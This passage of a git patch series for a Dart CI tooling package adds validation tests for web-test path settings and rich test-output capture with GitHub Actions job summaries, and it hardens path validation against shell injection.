anyElement(contains('forward slashes'))); + }); + + test('web_test.paths with unsupported characters produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['test/web test/foo.dart'], + }), + ); + expect(errors, anyElement(contains('unsupported characters'))); + }); + + test('web_test.paths with leading whitespace produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': [' test/web/foo_test.dart'], + }), + ); + expect(errors, anyElement(contains('whitespace'))); + }); + + test('web_test.paths with tilde produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['~/test/foo.dart'], + }), + ); + expect(errors, anyElement(contains('must be a relative repo path'))); + }); + + test('web_test.paths with newline produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['test/foo\nbar.dart'], + }), + ); + expect(errors, anyElement(contains('newlines/tabs'))); + }); + + test('valid web_test.paths passes', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['test/web/foo_test.dart', 'test/web/bar_test.dart'], + }), + ); + expect(errors.where((e) => e.contains('web_test')), isEmpty); + }); + + test('empty web_test.paths list is fine', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: {'paths': []}), + ); + expect(errors.where((e) => e.contains('web_test')), isEmpty); + }); + + test('valid full web_test config passes', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'concurrency': 2, + 'paths': ['test/web/'], + }), + ); + expect(errors.where((e) => e.contains('web_test')), isEmpty); + }); + }); + // ---- fully valid config produces no errors ---- test('fully valid config produces no errors', () { final errors = WorkflowGenerator.validate(_validConfig( dartSdk: '3.9.2', - features: {'proto': true, 'lfs': false}, + features: {'proto': true, 'lfs': false, 'web_test': true}, platforms: ['ubuntu', 'macos'], secrets: {'API_KEY': 'MY_SECRET'}, pat: 'MY_PAT', @@ -509,6 +667,7 @@ void main() { {'name': 'core', 'path': 'packages/core'}, ], runnerOverrides: {'ubuntu': 'custom-runner'}, + webTest: {'concurrency': 2, 'paths': ['test/web/']}, )); expect(errors, isEmpty); }); From 82fbad0a34c2ab84c91910a72d4942ef6abd3996 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 17:18:27 -0500 Subject: [PATCH 02/16] feat: enhanced managed test with full output capture and rich job summaries Two-layer capture strategy for comprehensive test output: - Layer 1 (zone-aware): --file-reporter json: captures all print() calls as PrintEvent objects with test attribution, --file-reporter expanded: captures human-readable output with all prints for all tests - Layer 2 (shell-level): 2>&1 | tee in CI template captures stdout.write(), isolate prints, and FFI output that bypass Dart zones TestCommand (live CI path via bin/manage_cicd.dart) now: - Uses Process.start() with piped streams for real-time + captured output - Writes structured logs to TEST_LOG_DIR (CI) or .dart_tool/test-logs/ - Parses NDJSON results for per-test pass/fail/skip with durations - Generates rich GitHub Actions job summaries with alert boxes, tables, and collapsible per-failure details (error, stack trace, captured prints) - Accumulates multiple errors per test (e.g. test + tearDown failures) - Dynamic code fence delimiters to prevent backtick injection - Cross-platform process.kill() (no ProcessSignal.sigkill on Windows) - UTF-8 decoder (dart test always outputs UTF-8) - 45-minute process timeout with 30-second stream drain timeout CI template updates: - shell: bash + set -o pipefail for cross-platform consistency - TEST_LOG_DIR env var passes log directory to Dart command - Artifact upload with if: always() and 14-day retention - Separate managed/unmanaged artifact upload paths Co-Authored-By: Claude Opus 4.6 --- lib/src/cli/commands/test_command.dart | 376 +++++++++++++++++++++++-- lib/src/cli/manage_cicd.dart | 126 +++++---- 2 files changed, 434 insertions(+), 68 deletions(-) diff --git a/lib/src/cli/commands/test_command.dart b/lib/src/cli/commands/test_command.dart index 18c73ed..93a322d 100644 --- a/lib/src/cli/commands/test_command.dart +++ b/lib/src/cli/commands/test_command.dart @@ -1,4 +1,5 @@ import 'dart:async'; +import 'dart:convert'; import 'dart:io'; import 'package:args/command_runner.dart'; @@ -8,13 +9,24 @@ import '../utils/logger.dart'; import '../utils/repo_utils.dart'; import '../utils/sub_package_utils.dart'; -/// Run `dart test` on the root package and all configured sub-packages. +/// Run `dart test` on the root package and all configured sub-packages with +/// full output capture (two-layer strategy). +/// +/// **Layer 1 — Zone-aware reporters:** `--file-reporter json:` captures all +/// `print()` calls as `PrintEvent` objects with test attribution, and +/// `--file-reporter expanded:` captures human-readable output. +/// +/// **Layer 2 — Shell-level `tee`:** Configured in the CI template to capture +/// anything that bypasses Dart zones (`stdout.write()`, isolate prints, FFI). +/// +/// All log files are written to `$TEST_LOG_DIR` (set by CI template) or +/// `/.dart_tool/test-logs/` locally. class TestCommand extends Command { @override final String name = 'test'; @override - final String description = 'Run dart test.'; + final String description = 'Run dart test with full output capture and job summary.'; @override Future run() async { @@ -29,34 +41,82 @@ class TestCommand extends Command { const processTimeout = Duration(minutes: 45); final failures = []; + // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) + final logDir = Platform.environment['TEST_LOG_DIR'] ?? '$repoRoot/.dart_tool/test-logs'; + Directory(logDir).createSync(recursive: true); + Logger.info('Log directory: $logDir'); + + final jsonPath = '$logDir/results.json'; + final expandedPath = '$logDir/expanded.txt'; + // Skip gracefully if no test/ directory exists final testDir = Directory('$repoRoot/test'); if (!testDir.existsSync()) { Logger.success('No test/ directory found — skipping root tests'); + _writeStepSummary('## Test Results\n\n**No test/ directory found — skipped.**\n'); } else { - // Use Process.start for streaming output instead of Process.runSync. - // This ensures real-time output in CI (runSync buffers everything until - // exit, so a hanging test produces zero output). - final process = await Process.start( - Platform.resolvedExecutable, - ['test', '--exclude-tags', 'gcp,integration'], - workingDirectory: repoRoot, - mode: ProcessStartMode.inheritStdio, - ); + // Build test arguments with two file reporters + expanded console output + final testArgs = [ + 'test', + '--exclude-tags', + 'gcp,integration', + '--chain-stack-traces', + '--reporter', + 'expanded', + '--file-reporter', + 'json:$jsonPath', + '--file-reporter', + 'expanded:$expandedPath', + ]; + + Logger.info('Running: dart ${testArgs.join(' ')}'); + + // Use Process.start with piped output so we can both stream to console + // AND capture the full output for summary generation. + final process = await Process.start(Platform.resolvedExecutable, testArgs, workingDirectory: repoRoot); + + // Stream stdout and stderr to console in real-time while capturing + final stdoutBuf = StringBuffer(); + final stderrBuf = StringBuffer(); + + final stdoutDone = process.stdout.transform(utf8.decoder).listen((data) { + stdout.write(data); + stdoutBuf.write(data); + }).asFuture(); + + final stderrDone = process.stderr.transform(utf8.decoder).listen((data) { + stderr.write(data); + stderrBuf.write(data); + }).asFuture(); // Process-level timeout: kill the test process if it exceeds 45 minutes. - // Individual test timeouts should catch hangs, but this is a safety net - // for cases where the test process itself doesn't exit (e.g., leaked - // isolates, open sockets keeping the event loop alive). final exitCode = await process.exitCode.timeout( processTimeout, onTimeout: () { Logger.error('Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); - process.kill(ProcessSignal.sigkill); + process.kill(); // No signal arg — cross-platform safe return -1; }, ); + try { + await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); + } catch (_) { + // Ignore stream errors (e.g. process killed before streams drained) + } + + // Write console output to log files + File('$logDir/dart_stdout.log').writeAsStringSync(stdoutBuf.toString()); + if (stderrBuf.isNotEmpty) { + File('$logDir/dart_stderr.log').writeAsStringSync(stderrBuf.toString()); + } + + // Parse the JSON results file for structured test data + final results = _parseTestResultsJson(jsonPath); + + // Generate and write the rich job summary + _writeTestJobSummary(results, exitCode, logDir); + if (exitCode != 0) { Logger.error('Root tests failed with exit code $exitCode'); failures.add(config.repoName); @@ -121,7 +181,7 @@ class TestCommand extends Command { processTimeout, onTimeout: () { Logger.error('Test process for $name exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); - spProcess.kill(ProcessSignal.sigkill); + spProcess.kill(); // No signal arg — cross-platform safe return -1; }, ); @@ -142,3 +202,287 @@ class TestCommand extends Command { Logger.success('All tests passed'); } } + +// ── NDJSON Parsing ──────────────────────────────────────────────────────────── + +/// A single test failure with its error, stack trace, and captured print output. +class _TestFailure { + final String name; + final String error; + final String stackTrace; + final String printOutput; + final int durationMs; + + _TestFailure({ + required this.name, + required this.error, + required this.stackTrace, + required this.printOutput, + required this.durationMs, + }); +} + +/// Parsed results from the NDJSON test results file. +class _TestResults { + int passed = 0; + int failed = 0; + int skipped = 0; + int totalDurationMs = 0; + final List<_TestFailure> failures = []; + bool parsed = false; +} + +/// Parse the NDJSON file produced by `--file-reporter json:`. +/// +/// Each line is a JSON object with a `type` field. We track: +/// - `testStart`: register test name + start time +/// - `testDone`: record result, compute duration +/// - `error`: capture error message + stack trace (accumulated per test) +/// - `print`: capture print output, attribute to testID +/// - `done`: overall total time +_TestResults _parseTestResultsJson(String jsonPath) { + final results = _TestResults(); + final file = File(jsonPath); + if (!file.existsSync()) { + Logger.warn('No JSON results file found at $jsonPath'); + return results; + } + + results.parsed = true; + + // Tracking maps keyed by testID + final testNames = {}; + final testStartTimes = {}; + final testErrors = {}; + final testStackTraces = {}; + final testPrints = {}; + + final lines = file.readAsLinesSync(); + for (final line in lines) { + if (line.trim().isEmpty) continue; + try { + final event = jsonDecode(line) as Map; + final type = event['type'] as String?; + + switch (type) { + case 'testStart': + final test = event['test'] as Map?; + if (test == null) break; + final id = test['id'] as int?; + if (id == null) break; + testNames[id] = test['name'] as String? ?? 'unknown'; + testStartTimes[id] = event['time'] as int? ?? 0; + + case 'testDone': + final id = event['testID'] as int?; + if (id == null) break; + final resultStr = event['result'] as String?; + final hidden = event['hidden'] as bool? ?? false; + final skipped = event['skipped'] as bool? ?? false; + + // Skip synthetic/hidden entries (group-level loading events) + if (hidden) break; + + if (skipped) { + results.skipped++; + } else if (resultStr == 'success') { + results.passed++; + } else if (resultStr == 'failure' || resultStr == 'error') { + results.failed++; + final startTime = testStartTimes[id] ?? 0; + final endTime = event['time'] as int? ?? 0; + results.failures.add( + _TestFailure( + name: testNames[id] ?? 'unknown', + error: testErrors[id]?.toString() ?? '', + stackTrace: testStackTraces[id]?.toString() ?? '', + printOutput: testPrints[id]?.toString() ?? '', + durationMs: endTime - startTime, + ), + ); + } + + case 'error': + final id = event['testID'] as int?; + if (id == null) break; + // Accumulate multiple errors per test (e.g. test failure + tearDown exception) + testErrors.putIfAbsent(id, () => StringBuffer()); + if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); + testErrors[id]!.write(event['error'] as String? ?? ''); + testStackTraces.putIfAbsent(id, () => StringBuffer()); + if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); + testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); + + case 'print': + final id = event['testID'] as int?; + if (id == null) break; + final message = event['message'] as String? ?? ''; + testPrints.putIfAbsent(id, () => StringBuffer()); + testPrints[id]!.writeln(message); + + case 'done': + final time = event['time'] as int? ?? 0; + results.totalDurationMs = time; + } + } catch (e) { + // Skip malformed JSON lines but continue parsing the rest + Logger.warn('Skipping malformed JSON line: $e'); + } + } + + return results; +} + +// ── Job Summary ─────────────────────────────────────────────────────────────── + +/// Generate a rich GitHub Actions job summary from parsed test results. +void _writeTestJobSummary(_TestResults results, int exitCode, String logDir) { + final buf = StringBuffer(); + + // Determine platform identifier for the heading + final platformId = + Platform.environment['PLATFORM_ID'] ?? Platform.environment['RUNNER_NAME'] ?? Platform.operatingSystem; + + buf.writeln('## Test Results — $platformId'); + buf.writeln(); + + if (!results.parsed) { + // Fallback: no JSON file was produced (test binary crashed before writing) + final status = exitCode == 0 ? 'passed' : 'failed'; + final icon = exitCode == 0 ? 'NOTE' : 'CAUTION'; + buf.writeln('> [!$icon]'); + buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.'); + buf.writeln(); + buf.writeln('Check the expanded output in test logs for details.'); + buf.writeln(); + buf.writeln(_artifactLink(':package: View full test logs')); + _writeStepSummary(buf.toString()); + return; + } + + final total = results.passed + results.failed + results.skipped; + final durationSec = (results.totalDurationMs / 1000).toStringAsFixed(1); + + // Status banner — alert box lines must all be prefixed with > + if (results.failed == 0) { + buf.writeln('> [!NOTE]'); + buf.writeln('> All $total tests passed in ${durationSec}s'); + } else { + buf.writeln('> [!CAUTION]'); + buf.writeln('> ${results.failed} of $total tests failed'); + } + buf.writeln(); + + // Summary table + buf.writeln('| Status | Count |'); + buf.writeln('|--------|------:|'); + buf.writeln('| :white_check_mark: Passed | ${results.passed} |'); + buf.writeln('| :x: Failed | ${results.failed} |'); + buf.writeln('| :fast_forward: Skipped | ${results.skipped} |'); + buf.writeln('| **Total** | **$total** |'); + buf.writeln('| **Duration** | **${durationSec}s** |'); + buf.writeln(); + + // Failed test details + if (results.failures.isNotEmpty) { + buf.writeln('### Failed Tests'); + buf.writeln(); + + // Cap at 20 failures to avoid exceeding the 1 MiB summary limit + final displayFailures = results.failures.take(20).toList(); + for (final f in displayFailures) { + final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; + buf.writeln('
'); + buf.writeln(':x: ${_escapeHtml(f.name)}$durStr'); + buf.writeln(); + + if (f.error.isNotEmpty) { + // Truncate very long error messages + final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; + buf.writeln('**Error:**'); + final fence = _codeFence(error); + buf.writeln(fence); + buf.writeln(error); + buf.writeln(fence); + buf.writeln(); + } + + if (f.stackTrace.isNotEmpty) { + // Truncate very long stack traces + final stack = f.stackTrace.length > 1500 ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' : f.stackTrace; + buf.writeln('**Stack Trace:**'); + final fence = _codeFence(stack); + buf.writeln(fence); + buf.writeln(stack); + buf.writeln(fence); + buf.writeln(); + } + + if (f.printOutput.isNotEmpty) { + final trimmed = f.printOutput.trimRight(); + final lineCount = trimmed.split('\n').length; + // Truncate captured output if it's very long + final printPreview = trimmed.length > 1500 ? '${trimmed.substring(0, 1500)}\n... (truncated)' : trimmed; + buf.writeln('**Captured Output ($lineCount lines):**'); + final fence = _codeFence(printPreview); + buf.writeln(fence); + buf.writeln(printPreview); + buf.writeln(fence); + buf.writeln(); + } + + buf.writeln('
'); + buf.writeln(); + } + + if (results.failures.length > 20) { + buf.writeln( + '_...and ${results.failures.length - 20} more failures. ' + 'See test logs artifact for full details._', + ); + buf.writeln(); + } + } + + // Artifact link + buf.writeln('---'); + buf.writeln(_artifactLink(':package: View full test logs')); + buf.writeln(); + + _writeStepSummary(buf.toString()); +} + +// ── Helpers ─────────────────────────────────────────────────────────────────── + +/// Write a markdown summary to $GITHUB_STEP_SUMMARY (visible in Actions UI). +/// No-op when running locally (env var not set). +void _writeStepSummary(String markdown) { + final summaryFile = Platform.environment['GITHUB_STEP_SUMMARY']; + if (summaryFile != null) { + File(summaryFile).writeAsStringSync(markdown, mode: FileMode.append); + } +} + +/// Build a link to the current workflow run's artifacts page. +String _artifactLink([String label = 'View all artifacts']) { + final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; + final repo = Platform.environment['GITHUB_REPOSITORY']; + final runId = Platform.environment['GITHUB_RUN_ID']; + if (repo == null || runId == null) return ''; + return '[$label]($server/$repo/actions/runs/$runId)'; +} + +/// Escape HTML special characters for safe embedding in GitHub markdown. +String _escapeHtml(String input) { + return input.replaceAll('&', '&').replaceAll('<', '<').replaceAll('>', '>').replaceAll('"', '"'); +} + +/// Choose a code fence delimiter that does not appear in [content]. +/// Starts with triple backticks and extends as needed. +String _codeFence(String content) { + var fence = '```'; + while (content.contains(fence)) { + fence += '`'; + } + return fence; +} diff --git a/lib/src/cli/manage_cicd.dart b/lib/src/cli/manage_cicd.dart index 8db2e7e..37a63b6 100644 --- a/lib/src/cli/manage_cicd.dart +++ b/lib/src/cli/manage_cicd.dart @@ -2173,7 +2173,7 @@ Future _runTest(String repoRoot) async { final testArgs = [ 'test', '--exclude-tags', - 'gcp', + 'gcp,integration', '--chain-stack-traces', '--reporter', 'expanded', @@ -2194,28 +2194,28 @@ Future _runTest(String repoRoot) async { final stdoutBuf = StringBuffer(); final stderrBuf = StringBuffer(); - final stdoutDone = process.stdout.transform(const SystemEncoding().decoder).listen((data) { + final stdoutDone = process.stdout.transform(utf8.decoder).listen((data) { stdout.write(data); stdoutBuf.write(data); }).asFuture(); - final stderrDone = process.stderr.transform(const SystemEncoding().decoder).listen((data) { + final stderrDone = process.stderr.transform(utf8.decoder).listen((data) { stderr.write(data); stderrBuf.write(data); }).asFuture(); - // Wait for streams to drain and process to exit (45-min safety timeout) + // Wait for process to exit (45-min safety timeout) const processTimeout = Duration(minutes: 45); final exitCode = await process.exitCode.timeout( processTimeout, onTimeout: () { _error('Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); - process.kill(ProcessSignal.sigkill); + process.kill(); // No signal arg — cross-platform safe return -1; }, ); try { - await Future.wait([stdoutDone, stderrDone]); + await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); } catch (_) { // Ignore stream errors (e.g. process killed before streams drained) } @@ -2287,31 +2287,25 @@ _TestResults _parseTestResultsJson(String jsonPath) { // Tracking maps keyed by testID final testNames = {}; final testStartTimes = {}; - final testErrors = {}; - final testStackTraces = {}; + final testErrors = {}; + final testStackTraces = {}; final testPrints = {}; - final skippedTests = {}; - try { - final lines = file.readAsLinesSync(); - for (final line in lines) { - if (line.trim().isEmpty) continue; + final lines = file.readAsLinesSync(); + for (final line in lines) { + if (line.trim().isEmpty) continue; + try { final event = jsonDecode(line) as Map; final type = event['type'] as String?; switch (type) { case 'testStart': final test = event['test'] as Map?; - if (test != null) { - final id = test['id'] as int; - testNames[id] = test['name'] as String? ?? 'unknown'; - testStartTimes[id] = event['time'] as int? ?? 0; - // Detect group-level "loading" entries (no real test) - final metadata = test['metadata'] as Map?; - if (metadata != null && metadata['skip'] == true) { - skippedTests[id] = true; - } - } + if (test == null) break; + final id = test['id'] as int?; + if (id == null) break; + testNames[id] = test['name'] as String? ?? 'unknown'; + testStartTimes[id] = event['time'] as int? ?? 0; case 'testDone': final id = event['testID'] as int?; @@ -2323,7 +2317,7 @@ _TestResults _parseTestResultsJson(String jsonPath) { // Skip synthetic/hidden entries (group-level loading events) if (hidden) break; - if (skipped || skippedTests[id] == true) { + if (skipped) { results.skipped++; } else if (resultStr == 'success') { results.passed++; @@ -2334,8 +2328,8 @@ _TestResults _parseTestResultsJson(String jsonPath) { results.failures.add( _TestFailure( name: testNames[id] ?? 'unknown', - error: testErrors[id] ?? '', - stackTrace: testStackTraces[id] ?? '', + error: testErrors[id]?.toString() ?? '', + stackTrace: testStackTraces[id]?.toString() ?? '', printOutput: testPrints[id]?.toString() ?? '', durationMs: endTime - startTime, ), @@ -2345,8 +2339,13 @@ _TestResults _parseTestResultsJson(String jsonPath) { case 'error': final id = event['testID'] as int?; if (id == null) break; - testErrors[id] = event['error'] as String? ?? ''; - testStackTraces[id] = event['stackTrace'] as String? ?? ''; + // Accumulate multiple errors per test (e.g. test failure + tearDown exception) + testErrors.putIfAbsent(id, () => StringBuffer()); + if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); + testErrors[id]!.write(event['error'] as String? ?? ''); + testStackTraces.putIfAbsent(id, () => StringBuffer()); + if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); + testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); case 'print': final id = event['testID'] as int?; @@ -2359,9 +2358,10 @@ _TestResults _parseTestResultsJson(String jsonPath) { final time = event['time'] as int? ?? 0; results.totalDurationMs = time; } + } catch (e) { + // Skip malformed JSON lines but continue parsing the rest + _warn('Skipping malformed JSON line: $e'); } - } catch (e) { - _warn('Failed to parse JSON results: $e'); } return results; @@ -2375,15 +2375,18 @@ void _writeTestJobSummary(_TestResults results, int exitCode, String logDir) { final platformId = Platform.environment['PLATFORM_ID'] ?? Platform.environment['RUNNER_NAME'] ?? Platform.operatingSystem; - buf.writeln('## Test Results — $platformId\n'); + buf.writeln('## Test Results — $platformId'); + buf.writeln(); if (!results.parsed) { // Fallback: no JSON file was produced (test binary crashed before writing) final status = exitCode == 0 ? 'passed' : 'failed'; final icon = exitCode == 0 ? 'NOTE' : 'CAUTION'; buf.writeln('> [!$icon]'); - buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.\n'); - buf.writeln('Check the expanded output in test logs for details.\n'); + buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.'); + buf.writeln(); + buf.writeln('Check the expanded output in test logs for details.'); + buf.writeln(); buf.writeln(_artifactLink(':package: View full test logs')); _writeStepSummary(buf.toString()); return; @@ -2392,14 +2395,15 @@ void _writeTestJobSummary(_TestResults results, int exitCode, String logDir) { final total = results.passed + results.failed + results.skipped; final durationSec = (results.totalDurationMs / 1000).toStringAsFixed(1); - // Status banner + // Status banner — alert box lines must all be prefixed with > if (results.failed == 0) { buf.writeln('> [!NOTE]'); - buf.writeln('> All $total tests passed in ${durationSec}s\n'); + buf.writeln('> All $total tests passed in ${durationSec}s'); } else { buf.writeln('> [!CAUTION]'); - buf.writeln('> ${results.failed} of $total tests failed\n'); + buf.writeln('> ${results.failed} of $total tests failed'); } + buf.writeln(); // Summary table buf.writeln('| Status | Count |'); @@ -2413,54 +2417,62 @@ void _writeTestJobSummary(_TestResults results, int exitCode, String logDir) { // Failed test details if (results.failures.isNotEmpty) { - buf.writeln('### Failed Tests\n'); + buf.writeln('### Failed Tests'); + buf.writeln(); // Cap at 20 failures to avoid exceeding the 1 MiB summary limit final displayFailures = results.failures.take(20).toList(); for (final f in displayFailures) { final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; buf.writeln('
'); - buf.writeln(':x: ${_escapeHtml(f.name)}$durStr\n'); + buf.writeln(':x: ${_escapeHtml(f.name)}$durStr'); + buf.writeln(); if (f.error.isNotEmpty) { // Truncate very long error messages final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; buf.writeln('**Error:**'); - buf.writeln('```'); + final errorFence = _codeFence(error); + buf.writeln(errorFence); buf.writeln(error); - buf.writeln('```\n'); + buf.writeln(errorFence); + buf.writeln(); } if (f.stackTrace.isNotEmpty) { // Truncate very long stack traces final stack = f.stackTrace.length > 1500 ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' : f.stackTrace; buf.writeln('**Stack Trace:**'); - buf.writeln('```'); + final stackFence = _codeFence(stack); + buf.writeln(stackFence); buf.writeln(stack); - buf.writeln('```\n'); + buf.writeln(stackFence); + buf.writeln(); } if (f.printOutput.isNotEmpty) { - final printLines = f.printOutput.split('\n'); - final lineCount = printLines.length; + final trimmed = f.printOutput.trimRight(); + final lineCount = trimmed.split('\n').length; // Truncate captured output if it's very long - final printPreview = f.printOutput.length > 1500 - ? '${f.printOutput.substring(0, 1500)}\n... (truncated)' - : f.printOutput.trimRight(); + final printPreview = trimmed.length > 1500 ? '${trimmed.substring(0, 1500)}\n... (truncated)' : trimmed; buf.writeln('**Captured Output ($lineCount lines):**'); - buf.writeln('```'); + final printFence = _codeFence(printPreview); + buf.writeln(printFence); buf.writeln(printPreview); - buf.writeln('```\n'); + buf.writeln(printFence); + buf.writeln(); } - buf.writeln('
\n'); + buf.writeln(''); + buf.writeln(); } if (results.failures.length > 20) { buf.writeln( '_...and ${results.failures.length - 20} more failures. ' - 'See test logs artifact for full details._\n', + 'See test logs artifact for full details._', ); + buf.writeln(); } } @@ -2474,7 +2486,17 @@ void _writeTestJobSummary(_TestResults results, int exitCode, String logDir) { /// Escape HTML special characters for safe embedding in GitHub markdown. String _escapeHtml(String input) { - return input.replaceAll('&', '&').replaceAll('<', '<').replaceAll('>', '>'); + return input.replaceAll('&', '&').replaceAll('<', '<').replaceAll('>', '>').replaceAll('"', '"'); +} + +/// Choose a code fence delimiter that does not appear in [content]. +/// Starts with triple backticks and extends as needed. +String _codeFence(String content) { + var fence = '```'; + while (content.contains(fence)) { + fence += '`'; + } + return fence; } /// Run dart analyze and fail only on actual errors. From 0b65313bd3bc778c1c5d7195f54974c52daffc22 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 18:32:26 -0500 Subject: [PATCH 03/16] fix: harden web_test validation, extract shared test utils, and expand test coverage Address all findings from PR #29 code review: - Add validate() guard in render() for defense-in-depth against shell injection - Cap web_test concurrency at 32 (Chrome instances are heavy) - Detect duplicate paths, unknown keys, and cross-validate feature vs config - Shell-quote and normalize web_test paths in rendered output - HTML-escape platformId in GitHub step summaries - Add sync comments and proto setup to web-test job template - Extract duplicated TestFailure/TestResults/parsing into shared test_results_util - Add escapeHtml to StepSummary utility class - Add 15+ new validation tests (traversal, shell metacharacters, duplicates, etc.) - Update SETUP.md concurrency range and paths wording Co-Authored-By: Claude Opus 4.6 --- SETUP.md | 6 +- USAGE.md | 16 +- lib/src/cli/commands/test_command.dart | 284 +------------------- lib/src/cli/manage_cicd.dart | 265 +----------------- lib/src/cli/utils/step_summary.dart | 5 + lib/src/cli/utils/test_results_util.dart | 262 ++++++++++++++++++ lib/src/cli/utils/workflow_generator.dart | 91 +++++-- templates/github/workflows/ci.skeleton.yaml | 13 + test/workflow_generator_test.dart | 259 +++++++++++++++++- 9 files changed, 617 insertions(+), 584 deletions(-) create mode 100644 lib/src/cli/utils/test_results_util.dart diff --git a/SETUP.md b/SETUP.md index 1f15342..4440965 100644 --- a/SETUP.md +++ b/SETUP.md @@ -312,10 +312,10 @@ The CI workflow (`.github/workflows/ci.yaml`) is generated from your `ci` sectio | `features.analysis_cache` | bool | `false` | Cache analysis results across runs | | `features.managed_analyze` | bool | `false` | Run `dart analyze` via tooling | | `features.managed_test` | bool | `false` | Run `dart test` via tooling | -| `features.build_runner` | bool | `false` | Run `dart run build_runner build --delete-conflicting-outputs` before analyze/test | +| `features.build_runner` | bool | `false` | Run `dart run build_runner build --delete-conflicting-outputs` before analyze, test, and web-test | | `features.web_test` | bool | `false` | Add a standalone `web-test` job that runs `dart test -p chrome` on Ubuntu | -| `web_test.concurrency` | int | `1` | Number of concurrent browser test suites | -| `web_test.paths` | list | `[]` | Specific test paths to run (empty = auto-discover all web-compatible tests) | +| `web_test.concurrency` | int | `1` | Number of concurrent browser test suites (1–32) | +| `web_test.paths` | list | `[]` | Specific test paths to run (empty = run all tests via `dart test -p chrome`) | | `platforms` | list | `["ubuntu"]` | Platform matrix. If 2+ entries, CI runs `analyze` once then `test` as a matrix. Valid: `ubuntu-x64`, `ubuntu-arm64`, `macos-arm64`, `macos-x64`, `windows-x64`, `windows-arm64` (plus aliases `ubuntu`, `macos`, `windows`). | | `runner_overrides` | object | `{}` | Override platform IDs to custom `runs-on` labels (e.g. org-managed GitHub-hosted runners). Example: `{ "ubuntu-arm64": "runtime-ubuntu-24.04-arm64-208gb-64core" }` | | `secrets` | object | `{}` | Additional secrets as `{ "ENV_NAME": "SECRET_NAME" }` | diff --git a/USAGE.md b/USAGE.md index 2190afa..4b8422e 100644 --- a/USAGE.md +++ b/USAGE.md @@ -501,14 +501,18 @@ dart run runtime_ci_tooling:manage_cicd create-release \ ### test -Run `dart test` excluding GCP-tagged tests. +Run `dart test` with enhanced output capture and job summary. ```bash dart run runtime_ci_tooling:manage_cicd test ``` -Runs `dart test --exclude-tags gcp`, parses output for pass/fail/skip counts, -and writes a GitHub Actions step summary. +**Enhanced managed test behavior (when `ci.features.managed_test=true`):** +- Excludes `gcp` and `integration` tags via `--exclude-tags gcp,integration` +- Uses JSON and expanded file reporters for full output capture (including `print()`, isolate output, FFI) +- Writes logs to `$TEST_LOG_DIR` (CI) or `.dart_tool/test-logs/` (local) +- Generates a rich GitHub Actions step summary with pass/fail/skip counts and failure details +- Runs tests in sub-packages (from `ci.sub_packages`) with `pub get` per package --- @@ -1256,8 +1260,10 @@ final exists = await commandExists('git'); - `ci.runner_overrides`: optional map to point platform IDs at custom `runs-on` labels (e.g. org-managed GitHub-hosted runners) **Optional features:** -- `ci.features.build_runner`: When `true`, runs `dart run build_runner build --delete-conflicting-outputs` before analyze and test steps to regenerate `.g.dart` codegen files -- `ci.features.web_test`: When `true`, adds a `web-test` job that provisions Chrome via `browser-actions/setup-chrome@v2` and runs `dart test -p chrome`. Configure concurrency and test paths via `ci.web_test.concurrency` (default `1`) and `ci.web_test.paths` (default `[]` = auto-discover) +- `ci.features.build_runner`: When `true`, runs `dart run build_runner build --delete-conflicting-outputs` before analyze, test, and web-test steps to regenerate `.g.dart` codegen files +- `ci.features.web_test`: When `true`, adds a `web-test` job that provisions Chrome via `browser-actions/setup-chrome@v2` and runs `dart test -p chrome`. Configure via `ci.web_test`: + - `concurrency` (1–32, default `1`): parallel test shards + - `paths`: list of relative repo paths (e.g. `["test/web/"]`): paths are normalized, shell-quoted, and validated (no traversal, no shell metacharacters). Empty list = run all tests **Key steps:** ```yaml diff --git a/lib/src/cli/commands/test_command.dart b/lib/src/cli/commands/test_command.dart index 93a322d..73c3b60 100644 --- a/lib/src/cli/commands/test_command.dart +++ b/lib/src/cli/commands/test_command.dart @@ -8,6 +8,7 @@ import '../../triage/utils/config.dart'; import '../utils/logger.dart'; import '../utils/repo_utils.dart'; import '../utils/sub_package_utils.dart'; +import '../utils/test_results_util.dart'; /// Run `dart test` on the root package and all configured sub-packages with /// full output capture (two-layer strategy). @@ -53,7 +54,7 @@ class TestCommand extends Command { final testDir = Directory('$repoRoot/test'); if (!testDir.existsSync()) { Logger.success('No test/ directory found — skipping root tests'); - _writeStepSummary('## Test Results\n\n**No test/ directory found — skipped.**\n'); + _writeTestStepSummary('## Test Results\n\n**No test/ directory found — skipped.**\n'); } else { // Build test arguments with two file reporters + expanded console output final testArgs = [ @@ -112,10 +113,10 @@ class TestCommand extends Command { } // Parse the JSON results file for structured test data - final results = _parseTestResultsJson(jsonPath); + final results = parseTestResultsJson(jsonPath); // Generate and 